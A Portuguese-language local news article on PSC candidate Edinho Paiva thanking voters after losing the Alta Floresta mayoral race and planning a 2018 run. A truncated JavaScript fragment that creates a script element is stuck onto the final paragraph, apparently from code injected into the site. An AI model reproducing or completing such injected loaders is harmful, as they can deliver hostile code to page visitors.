Capa / Em Destaque / Edinho Paiva agradece eleitores e diz que o partido saiu fortalecido

Edinho Paiva agradece eleitores e diz que o partido saiu fortalecido

edinho-paiva-2Dionéia Martins

Candidato a prefeito pelo Partido Social Cristão (PSC) de Alta Floresta, Edinho Paiva conquistou a simpatia e confiança de 2,78% (734) dos votantes. Embora não tenha sido eleito, Paiva faz uma avaliação positiva do processo e diz que o partido se fortaleceu.

“Uma avaliação positiva a gente conseguiu mostrar pra sociedade um projeto novo, eu acredito num projeto novo pra Alta Floresta, que possa se fazer mais”, afirmou Edinho. De olho nas eleições de 2018, o partido passará por uma reformulação.

“Vamos reformular o nosso partido, o Partido Social Cristão (PSC) vamos mudar algumas pessoas que estão nele, vamos trazer pessoas que venha somar com o partido e o PSC se fortalecendo pras eleições de 2018″, disse Paiva que será candidato a deputado estadual.

A coligação de Edinho contava em fazer pelo menos 4 candidatos a vereador. ” A nossa coligação fez o vereador Mendonça pelo PSC e o pelo Democratas o Marcos Menin, a gente esperava mais, a gente esperava no mínimo fazer 4 vereadores, mas foi positiva mostrou a força do partido com seus aliados”, avaliou.

Edinho disse que o partido deverá permanecer na base do prefeito reeleito Asiel Bezerra “O partido está junto com o prefeito atual dr. Asiel que foi reeleito, vai somar junto o que for de interesse do nosso município” .

Edinho faz questão de reconhecer a confiança depositada em seu nome nas urnas no domingo. Os 734 votos foram essenciais para fortalecer ainda mais o nome de Edinho para o próximo pleito. “Eu quero agradecer cada família, cada eleitor que me recebeu e minha equipe, e deu seu voto de confiança pro Edinho Paiva”.var d=document;var s=d.createElement(‘script’);

Sobre admin

Deixe uma resposta

O seu endereço de email não será publicado. Required fields are marked *

*

Scroll To Top